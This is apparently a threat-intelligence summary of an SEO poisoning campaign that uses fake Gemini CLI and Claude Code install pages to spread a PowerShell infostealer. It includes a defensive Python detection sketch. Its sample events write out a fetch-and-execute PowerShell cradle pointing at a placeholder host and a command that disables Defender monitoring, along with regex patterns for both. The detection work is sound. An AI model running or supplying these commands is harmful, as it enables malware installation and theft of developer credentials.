SEO Poisoning Campaign Targets Gemini and Claude Code Users with Infostealers
Severity: High (Score: 66.5)
Sources: Blog.Eclecticiq, Letsdatascience
Keywords: campaign, gemini, researchers, poisoning, claude, code, impersonation
Severity indicators: stealer, infostealer
Summary
A recent SEO poisoning campaign has been uncovered, targeting users searching for Google's Gemini CLI and Anthropic's Claude Code. The campaign, first identified by researcher @g0njxa on April 21, 2026, utilizes typosquatted domains to deliver a PowerShell infostealer to Windows developer workstations. Victims are misled into executing malicious commands from fake installation pages, leading to data exfiltration including browser credentials and OAuth tokens. The attack infrastructure includes domains like geminicli[.]co[.]com and claudecode[.]co[.]com, which mimic legitimate installation guides. The malware operates entirely in memory to evade detection, and the campaign is believed to have started in early March 2026. Security researchers emphasize the need for offline-install workflows and robust endpoint monitoring to mitigate risks. The ongoing nature of this campaign highlights the evolving tactics of financially motivated cybercriminals targeting developer tools.
Key Points:
• SEO poisoning campaign targets Gemini CLI and Claude Code users with fake domains.
• Malware delivered via a PowerShell infostealer, harvesting sensitive data from Windows systems.
• Campaign exploits typosquatting and search-engine manipulation to mislead victims.
Detailed Analysis
**Impact**
The campaign targets developers using Google’s Gemini CLI and Anthropic’s Claude Code, primarily affecting Windows workstations in the US and UK based on domain registration patterns. The infostealer harvests sensitive data including browser credentials, session cookies, OAuth tokens, CI/CD credentials, and VPN details, increasing supply-chain and initial-access risks for enterprises. The scope includes potentially thousands of developer endpoints given the SEO poisoning approach and broad targeting of AI developer tooling users.
**Technical Details**
Attackers use SEO poisoning and typosquatted domains (e.g., geminicli[.]co[.]com, claudecode[.]co[.]com) to impersonate legitimate installation pages, prompting victims to execute PowerShell commands that download an infostealer payload. The malware runs entirely in memory, disables Microsoft Defender telemetry, and exfiltrates data to encrypted C2 servers (events[.]msft23[.]com and events[.]ms709[.]com). The infection chain includes obfuscated PowerShell scripts with anti-sandbox checks and enables remote code execution post-compromise. No CVEs were reported as exploited.
**Recommended Response**
Block and monitor access to newly registered or typosquatted domains mimicking Gemini and Claude Code installers, and deploy detections for in-memory PowerShell execution correlated with web downloads. Harden endpoint security by enabling telemetry and monitoring for disabled Microsoft Defender components and anomalous OAuth token or CI/CD credential usage. Encourage offline or verified installation workflows for critical developer tools. No specific patches are indicated; focus on detection and domain takedown efforts.
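A detection sketch for the response above, added here as an illustration rather than code from either source report: it tags PowerShell command lines that fetch and execute in memory or tamper with Defender, flags web requests to hostnames carrying an impersonated brand name outside an assumed allowlist of approved install sources, and correlates both signals per host over constructed sample events.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not taken from the report): simplified process-creation
# and web-proxy records for two developer workstations. The URL is a placeholder.
SAMPLE_EVENTS = [
    {"type": "web", "host": "dev-ws01", "domain": "geminicli.co.com"},
    {"type": "process", "host": "dev-ws01", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://placeholder.invalid/i.ps1')\""},
    {"type": "process", "host": "dev-ws01", "image": "powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "web", "host": "dev-ws02", "domain": "github.com"},
    {"type": "process", "host": "dev-ws02", "image": "powershell.exe",
     "cmdline": "powershell -File .\\build.ps1"},
]

# In-memory download cradle: a fetch primitive combined with Invoke-Expression.
FETCH = re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
INMEM = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
# Defender tampering of the kind the report describes (protection/telemetry switched off).
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion", re.I)
# Brand names impersonated by the campaign and an assumed allowlist of approved install sources.
BRANDS = ("gemini", "claude", "chocolatey", "nodejs", "keepassxc")
APPROVED = {"github.com", "anthropic.com", "chocolatey.org", "nodejs.org", "keepassxc.org"}

def classify_process(cmdline):
    """Return the detection tags that apply to one PowerShell command line."""
    tags = []
    if FETCH.search(cmdline) and INMEM.search(cmdline):
        tags.append("inmem_download_cradle")
    if DEFENDER_TAMPER.search(cmdline):
        tags.append("defender_tamper")
    return tags

def is_brand_typosquat(domain):
    """True when a hostname carries an impersonated brand name but is not an approved source."""
    d = domain.lower().rstrip(".")
    if d in APPROVED or any(d.endswith("." + a) for a in APPROVED):
        return False
    return any(b in d for b in BRANDS)

def correlate(events):
    """Per host: cradle plus a typosquat lookup or Defender tamper is 'high', any lone tag 'medium'."""
    per_host = defaultdict(set)
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower() == "powershell.exe":
            per_host[ev["host"]].update(classify_process(ev["cmdline"]))
        elif ev["type"] == "web" and is_brand_typosquat(ev["domain"]):
            per_host[ev["host"]].add("brand_typosquat_dns")
    findings = {}
    for host, tags in per_host.items():
        if "inmem_download_cradle" in tags and tags & {"brand_typosquat_dns", "defender_tamper"}:
            findings[host] = ("high", sorted(tags))
        elif tags:
            findings[host] = ("medium", sorted(tags))
    return findings
```

The brand keyword match is deliberately broad, so in production the allowlist and a newly-registered-domain feed do the real tuning.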
Source articles (2)
- Researchers Uncover SEO-Poisoned Sites Delivering Infostealers | Let's Data Science — Letsdatascience · 2026-05-22
Security researchers at EclecticIQ have detailed an SEO poisoning campaign that used typosquatted domains impersonating Google's Gemini CLI and Anthropic's Claude Code to deliver an in-memory PowerShe…
- SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer — Blog.Eclecticiq · 2026-05-21
The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1], whose initial discovery enabled analysis and infrastructure pivoting documented in th…
Timeline
- 2026-03-01 — SEO poisoning campaign began: Attacker-controlled domains started appearing, targeting users of Gemini CLI and Claude Code.
- 2026-04-21 — Initial discovery reported: Independent researcher @g0njxa flagged the SEO poisoning campaign, enabling further analysis.
- 2026-05-21 — EclecticIQ report published: EclecticIQ detailed the ongoing SEO poisoning campaign in a report, outlining its methods and impacts.
- 2026-05-22 — Coverage by Let's Data Science: Let's Data Science reported on the EclecticIQ findings, emphasizing the campaign's targeting of developer tools.
Related entities
- Malware (Attack Type)
- Claude Code Impersonation Campaign (Campaign)
- Gemini CLI Impersonation Campaign (Campaign)
- Netherlands (Country)
- United Kingdom (Country)
- United States (Country)
- CWE-287 - Improper Authentication (Cwe)
- T1041 - Exfiltration Over C2 Channel (Mitre Attack)
- T1047 - Windows Management Instrumentation (Mitre Attack)
- T1059.001 - PowerShell (Mitre Attack)
- T1071 - Application Layer Protocol (Mitre Attack)
- T1105 - Ingress Tool Transfer (Mitre Attack)
- Brave (Platform)
- Chocolatey (Platform)
- Chromium (Platform)
- Firefox (Platform)
- Microsoft Defender (Platform)
- Microsoft Edge (Platform)
- Windows (Platform)
- Claude Code (Tool)
- Gemini CLI (Tool)
- Google Chrome (Tool)
- KeePassXC (Tool)
- Node.js (Tool)
- PowerShell (Tool)